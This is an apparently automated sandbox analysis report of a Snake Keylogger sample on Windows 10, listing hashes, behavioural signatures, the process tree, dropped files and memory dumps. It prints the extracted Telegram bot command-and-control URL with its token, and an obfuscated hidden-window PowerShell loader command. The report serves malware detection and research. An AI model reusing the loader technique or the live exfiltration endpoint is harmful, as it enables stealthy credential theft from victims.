Analysis

  • max time kernel
    94s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-11-2024 03:04

General

  • Target

    b23119bb95d44f50e52555f51c9931389d3d559b9f74e34041e9fa6bc2b7f481.exe

  • Size

    767KB

  • MD5

    21a5378b2c78f66fff23ec764cba65f2

  • SHA1

    94e2921a8a2e47611c936235b5ba03feecf00fff

  • SHA256

    b23119bb95d44f50e52555f51c9931389d3d559b9f74e34041e9fa6bc2b7f481

  • SHA512

    885aaec0dea4fbf8d46da71bb34f776a8f212e99bf7da7082ef312a1936d46d5b59327c5650a50582df474cae7174dfafe3fa606876d218501f02cd3a25e05d0

  • SSDEEP

    12288:bMwhYlU9blucsKZ1XjfCTD/qp0xmk9qPARcQFY9fcNLqH66cOsFoTvGU5ZqLm:bMwhY+9blYKPGZx0PARxFWfcFqal/F4X

Malware Config

Extracted

Family

snakekeylogger

C2

https://api.telegram.org/bot7602241848:AAGOG1RAiVBKad-IMDgRf04J_SQO8x6g-hI/sendMessage?chat_id=5302361040

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 1 IoCs
  • Snakekeylogger family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b23119bb95d44f50e52555f51c9931389d3d559b9f74e34041e9fa6bc2b7f481.exe
    "C:\Users\Admin\AppData\Local\Temp\b23119bb95d44f50e52555f51c9931389d3d559b9f74e34041e9fa6bc2b7f481.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:756
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Electricizes=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\haandbog\Saganashes.Com';$Forbudsbestemmelses=$Electricizes.SubString(52619,3);.$Forbudsbestemmelses($Electricizes)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:852
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        PID:3912
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 1528
          4⤵
          • Program crash
          PID:2200
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3912 -ip 3912
    1⤵
      PID:3124

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_skld33gt.v2p.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\haandbog\Placid.Sel

      Filesize

      307KB

      MD5

      1bed7803db687e44713436a3b1bfa9e7

      SHA1

      4b3780aac93d35e522adce172a3d2d84c8d471f4

      SHA256

      ca6d0e27587fce2950cba487f154c9c47e2c668dbeee96328eb439a08febf664

      SHA512

      dece7d3399b5fb0fca591eb8588cb1a3bd340019db3e376cd321bbfe6993c330af7171602758a20b268bb8572688d1270fe8b2f3f09fc22f72715868d237528a

    • C:\Users\Admin\AppData\Local\Temp\haandbog\Saganashes.Com

      Filesize

      51KB

      MD5

      86971efe48eae4401b734e86152c12aa

      SHA1

      93376b7df5fa9f5d363e263dd898b86e42e40ec0

      SHA256

      8e626d6dc0bb24ed272eaec732b70f81e306c38eba28df9e96ce78d61a75e455

      SHA512

      a04489dfa81e2fe20f1a8f07c562ed4a05f85b74d5745d6cb712252a46f997a7de6c9f11c3fa902c7c7b03f6ff8596e89e064c251b6a348dfb0d3b7ff6a02455

    • C:\Users\Admin\AppData\Local\orts.lnk

      Filesize

      1KB

      MD5

      9562e3a49b50d273ebdef2d6e4ca35bc

      SHA1

      4855e3f6e6bf99ea7d854afcdaa82bad6abf8e44

      SHA256

      df5d0eb826af1404315d412e2a29048e12d44b601725aaf0eb75a258b8305084

      SHA512

      d44f859a6dcf96052f0ecb2f18ce404949f975fdec68e45a752edb6af48455a53c548ce4ec339af9ed316a3ea06d1eae25140c17f55f13faaa0883a1a73206eb

    • memory/852-199-0x00000000735A0000-0x0000000073D50000-memory.dmp

      Filesize

      7.7MB

    • memory/852-225-0x0000000008E20000-0x000000000C70C000-memory.dmp

      Filesize

      56.9MB

    • memory/852-175-0x00000000054B0000-0x00000000054D2000-memory.dmp

      Filesize

      136KB

    • memory/852-173-0x00000000735A0000-0x0000000073D50000-memory.dmp

      Filesize

      7.7MB

    • memory/852-183-0x0000000005660000-0x00000000056C6000-memory.dmp

      Filesize

      408KB

    • memory/852-182-0x0000000005E00000-0x0000000005E66000-memory.dmp

      Filesize

      408KB

    • memory/852-188-0x0000000005F70000-0x00000000062C4000-memory.dmp

      Filesize

      3.3MB

    • memory/852-189-0x0000000006480000-0x000000000649E000-memory.dmp

      Filesize

      120KB

    • memory/852-190-0x00000000064C0000-0x000000000650C000-memory.dmp

      Filesize

      304KB

    • memory/852-191-0x0000000007520000-0x00000000075B6000-memory.dmp

      Filesize

      600KB

    • memory/852-192-0x0000000006950000-0x000000000696A000-memory.dmp

      Filesize

      104KB

    • memory/852-193-0x00000000069D0000-0x00000000069F2000-memory.dmp

      Filesize

      136KB

    • memory/852-194-0x0000000007B70000-0x0000000008114000-memory.dmp

      Filesize

      5.6MB

    • memory/852-212-0x0000000007910000-0x00000000079B3000-memory.dmp

      Filesize

      652KB

    • memory/852-196-0x00000000087A0000-0x0000000008E1A000-memory.dmp

      Filesize

      6.5MB

    • memory/852-197-0x00000000078C0000-0x00000000078F2000-memory.dmp

      Filesize

      200KB

    • memory/852-172-0x0000000002EA0000-0x0000000002ED6000-memory.dmp

      Filesize

      216KB

    • memory/852-198-0x000000006FA30000-0x000000006FA7C000-memory.dmp

      Filesize

      304KB

    • memory/852-230-0x00000000735A0000-0x0000000073D50000-memory.dmp

      Filesize

      7.7MB

    • memory/852-176-0x00000000735A0000-0x0000000073D50000-memory.dmp

      Filesize

      7.7MB

    • memory/852-174-0x00000000056D0000-0x0000000005CF8000-memory.dmp

      Filesize

      6.2MB

    • memory/852-211-0x00000000735A0000-0x0000000073D50000-memory.dmp

      Filesize

      7.7MB

    • memory/852-213-0x0000000007A30000-0x0000000007A3A000-memory.dmp

      Filesize

      40KB

    • memory/852-214-0x0000000007A70000-0x0000000007A9A000-memory.dmp

      Filesize

      168KB

    • memory/852-215-0x0000000007AA0000-0x0000000007AC4000-memory.dmp

      Filesize

      144KB

    • memory/852-216-0x00000000735A0000-0x0000000073D50000-memory.dmp

      Filesize

      7.7MB

    • memory/852-218-0x00000000735AE000-0x00000000735AF000-memory.dmp

      Filesize

      4KB

    • memory/852-219-0x00000000735A0000-0x0000000073D50000-memory.dmp

      Filesize

      7.7MB

    • memory/852-220-0x00000000735A0000-0x0000000073D50000-memory.dmp

      Filesize

      7.7MB

    • memory/852-171-0x00000000735AE000-0x00000000735AF000-memory.dmp

      Filesize

      4KB

    • memory/852-222-0x00000000735A0000-0x0000000073D50000-memory.dmp

      Filesize

      7.7MB

    • memory/852-223-0x00000000735A0000-0x0000000073D50000-memory.dmp

      Filesize

      7.7MB

    • memory/852-224-0x00000000735A0000-0x0000000073D50000-memory.dmp

      Filesize

      7.7MB

    • memory/852-210-0x00000000078A0000-0x00000000078BE000-memory.dmp

      Filesize

      120KB

    • memory/852-226-0x00000000735A0000-0x0000000073D50000-memory.dmp

      Filesize

      7.7MB

    • memory/852-227-0x00000000735A0000-0x0000000073D50000-memory.dmp

      Filesize

      7.7MB

    • memory/852-228-0x00000000735A0000-0x0000000073D50000-memory.dmp

      Filesize

      7.7MB

    • memory/852-200-0x000000006FB90000-0x000000006FEE4000-memory.dmp

      Filesize

      3.3MB

    • memory/3912-231-0x0000000000C00000-0x0000000001E54000-memory.dmp

      Filesize

      18.3MB